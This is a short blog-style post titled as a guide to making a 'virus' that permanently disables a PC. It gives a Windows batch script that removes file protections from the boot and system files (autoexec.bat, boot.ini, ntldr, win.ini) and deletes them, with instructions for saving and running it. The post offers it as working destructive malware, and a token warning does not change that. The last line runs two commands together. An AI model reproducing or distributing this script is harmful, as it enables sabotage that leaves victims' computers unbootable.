How To Make A Virus That Shutdown The PC Forever!!!
How To Make A Virus That Shutdown The PC Forever!!! |
Do Not Try It At Home!!!!
Just copy the below code in notepad and save it as anyname.bat with save as type = all files
and when you open the file it will shutdown your computer and then you will not able to restart it.
It actually deletes the system files which are responsible for system start up.
Like us on facebook.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.inidel c:\windows\win.ini
Post a Comment